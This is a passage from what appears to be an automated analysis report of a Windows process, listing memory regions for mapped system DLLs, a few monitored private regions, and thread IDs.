0 entry_point = 0x7ff881384b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3875 start_va = 0x7ff881620000 end_va = 0x7ff881c63fff monitored = 0 entry_point = 0x7ff8817e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3876 start_va = 0x7ff881c70000 end_va = 0x7ff881d24fff monitored = 0 entry_point = 0x7ff881cb22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3877 start_va = 0x7ff881d50000 end_va = 0x7ff881db9fff monitored = 0 entry_point = 0x7ff881d86d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3878 start_va = 0x7ff881ed0000 end_va = 0x7ff8820b7fff monitored = 0 entry_point = 0x7ff881efba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3879 start_va = 0x7ff8820c0000 end_va = 0x7ff882215fff monitored = 0 entry_point = 0x7ff8820ca8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3880 start_va = 0x7ff882220000 end_va = 0x7ff8822bcfff monitored = 0 entry_point = 0x7ff8822278a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3881 start_va = 0x7ff8822c0000 end_va = 0x7ff88253cfff monitored = 0 entry_point = 0x7ff882394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3882 start_va = 0x7ff882550000 end_va = 0x7ff8825aafff monitored = 0 entry_point = 0x7ff8825638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3883 start_va = 0x7ff8825b0000 end_va = 0x7ff883b0efff monitored = 0 entry_point = 0x7ff8827111f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3884 start_va = 0x7ff883bf0000 end_va = 0x7ff883d0bfff monitored = 0 entry_point = 0x7ff883c302b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3885 start_va = 0x7ff8841b0000 end_va = 0x7ff884256fff monitored = 0 entry_point = 0x7ff8841bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3886 start_va = 0x7ff884410000 end_va = 0x7ff8844d0fff monitored = 0 entry_point = 0x7ff884430da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3887 start_va = 0x7ff884920000 end_va = 0x7ff8849c6fff monitored = 0 entry_point = 0x7ff8849358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3888 start_va = 0x7ff8849d0000 end_va = 0x7ff884a0afff monitored = 0 entry_point = 0x7ff8849d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3889 start_va = 0x7ff884a10000 end_va = 0x7ff884b95fff monitored = 0 entry_point = 0x7ff884a5ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3890 start_va = 0x7ff884bb0000 end_va = 0x7ff884c01fff monitored = 0 entry_point = 0x7ff884bbf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3891 start_va = 0x7ff884c10000 end_va = 0x7ff884cbcfff monitored = 0 entry_point = 0x7ff884c281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3892 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3909 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 4026 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 4027 start_va = 0x2510000 end_va = 0x2517fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Thread: id = 158 os_tid = 0x7a8 Thread: id = 159 os_tid = 0xf70 Thread: id = 160 os_tid = 0xce0 Thread: id = 161 os_tid = 0xedc Thread: id = 162 os_tid = 0xb68 Thread: id = 163 os_tid = 0xb5c Thread: id = 164 os_tid = 0xb40